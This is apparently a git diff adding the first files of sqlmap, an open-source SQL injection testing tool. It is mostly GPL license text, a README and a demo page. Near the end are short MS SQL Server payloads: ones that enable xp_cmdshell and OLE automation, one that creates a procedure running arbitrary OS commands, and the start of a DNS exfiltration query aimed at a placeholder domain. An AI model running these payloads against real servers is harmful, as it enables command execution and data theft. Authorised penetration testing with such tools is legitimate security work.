-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
+COPYING -- Describes the terms under which sqlmap is distributed. A copy
+of the GNU General Public License (GPL) is appended to this file.
+
+sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+sqlmap technology into proprietary software, we sell alternative licenses
+(contact sales@sqlmap.org).
+
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from sqlmap.
+* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
+* Executes sqlmap and parses the results (as opposed to typical shell or
+  execution-menu apps, which simply display raw sqlmap output and so are
+  not derivative works).
+* Integrates/includes/aggregates sqlmap into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
+
+The term "sqlmap" should be taken to also include any portions or derived
+works of sqlmap. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to sqlmap - we do not speak for other people's
+GPL works.
+
+This license does not apply to the third-party components. More details can
+be found inside the file 'doc/THIRD-PARTY.md'.
+
+If you have any questions about the GPL licensing restrictions on using
+sqlmap in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate sqlmap into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes to dev@sqlmap.org for possible
+incorporation into the main distribution. By sending these changes to the
+sqlmap developers or via Git pull request, checking them into the sqlmap
+source code repository, it is understood (unless you specify otherwise)
+that you are offering the sqlmap project the unlimited, non-exclusive
+right to reuse, modify, and relicense the code. sqlmap will always be
+available Open Source, but this is important because the inability to
+relicense code has caused devastating problems for other Free Software
+projects (such as KDE and NASM). If you wish to specify special license
+conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS

README.md

@@ -0,0 +1,78 @@
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
+
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
+
+Screenshots
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://asciinema.org/a/46601).
+To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Links
+----
+
+* Homepage: https://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Translations
+----
+
+* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
+* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
+* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
+* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
+* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md)
+* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
+* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
+* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
+* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
+* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
+* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)

data/html/index.html

@@ -0,0 +1,151 @@
+<!DOCTYPE html>
+
+<!-- https://angrytools.com/bootstrap/editor/ -->
+
+<html lang="en">
+<head>
+    <title>DEMO</title>
+    <meta charset="utf-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
+
+    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
+</head>
+<body>
+    <style>
+  #wrapper { width: 100%; }
+
+  #page-wrapper {
+    padding: 0 15px;
+    min-height: 568px;
+    background-color: #fff;
+  }
+
+  @media(min-width:768px) {
+    #page-wrapper {
+      position: inherit;
+      margin: 0 0 0 250px;
+      padding: 0 30px;
+      border-left: 1px solid #e7e7e7;
+    }
+  }
+
+  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
+  .sidebar .sidebar-search { padding: 15px; }
+  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }
+
+  .sidebar ul li a.active { background-color: #eee; }
+
+  .sidebar .arrow { float: right;}
+  .sidebar .fa.arrow:before { content: "f104";}
+  .sidebar .active>a>.fa.arrow:before { content: "f107"; }
+  .sidebar .nav-second-level li,
+  .sidebar .nav-third-level li {
+    border-bottom: 0!important;
+  }
+
+  .sidebar .nav-second-level li a { padding-left: 37px; }
+  .sidebar .nav-third-level li a { padding-left: 52px; }
+
+  @media(min-width:768px) {
+    .sidebar {
+      z-index: 1;
+      position: absolute;
+      width: 250px;
+      margin-top: 51px;
+    }
+  }
+</style>
+<div id="wrapper">
+
+  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
+    <div class="navbar-header">
+      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
+        <span class="sr-only">Toggle navigation</span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+      </button>
+      <a class="navbar-brand" href="index.html">sqlmap</a>
+    </div>
+
+    <div class="navbar-default sidebar" role="navigation">
+      <div class="sidebar-nav navbar-collapse">
+        <ul class="nav" id="side-menu">
+          <li>
+            <a href="#"><em class="glyphicon glyphicon-home"></em> Options<span class="arrow"></span></a>
+            <ul class="nav nav-second-level">
+              <li><a>Target</a></li>
+              <li><a>Request</a></li>
+              <li><a>Optimization</a></li>
+              <li><a>Injection</a></li>
+              <li><a>Detection</a></li>
+              <li><a>Techniques</a></li>
+              <li><a>Fingerprint</a></li>
+              <li><a>Enumeration</a></li>
+              <li><a>Brute force</a></li>
+              <li><a>User-defined function injection</a></li>
+              <li><a>File system access</a></li>
+              <li><a>Operating system access</a></li>
+              <li><a>Windows registry access</a></li>
+              <li><a>General</a></li>
+              <li><a>Miscellaneous</a></li>
+            </ul>
+          </li>
+        </ul>
+      </div>
+    </div>
+  </nav>
+
+  <div id="page-wrapper">
+    <div class="row">
+      <h4>DEMO</h4>
+    </div>
+  </div>
+</div>
+<script>
+  /*
+ * metismenu - v1.0.3
+ * Easy menu jQuery plugin for Twitter Bootstrap 3
+ * https://github.com/onokumus/metisMenu
+ *
+ * Made by Osman Nuri Okumuş
+ * Under MIT License
+*/
+  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
+
+  $(function() {
+
+    $('#side-menu').metisMenu();
+
+  });
+
+  //Loads the correct sidebar on window load,
+  //collapses the sidebar on window resize.
+  // Sets the min-height of #page-wrapper to window size
+  $(function() {
+    $(window).bind("load resize", function() {
+      topOffset = 50;
+      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
+      if (width < 768) {
+        $('div.navbar-collapse').addClass('collapse')
+        topOffset = 100; // 2-row-menu
+      } else {
+        $('div.navbar-collapse').removeClass('collapse')
+      }
+
+      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
+      height = height - topOffset;
+      if (height < 1) height = 1;
+      if (height > topOffset) {
+        $("#page-wrapper").css("min-height", (height) + "px");
+      }
+    })
+  });
+</script>
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
+    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
+</body>
+</html>

data/procs/README.txt

@@ -0,0 +1,4 @@
+Files in this folder represent SQL snippets used by sqlmap on the target
+system.
+They are licensed under the terms of the GNU Lesser General Public License
+where not specified otherwise.

data/procs/mssqlserver/activate_sp_oacreate.sql

@@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/configure_openrowset.sql

@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options', 1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC sp_configure 'show advanced options', 0;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/configure_xp_cmdshell.sql

@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'show advanced options',0;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/create_new_xp_cmdshell.sql

@@ -0,0 +1,3 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%

data/procs/mssqlserver/disable_xp_cmdshell_2000.sql

@@ -0,0 +1 @@
+EXEC master..sp_dropextendedproc 'xp_cmdshell'

data/procs/mssqlserver/dns_request.sql

@@ -0,0 +1,4 @@
+DECLARE @host varchar(1024);
+SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
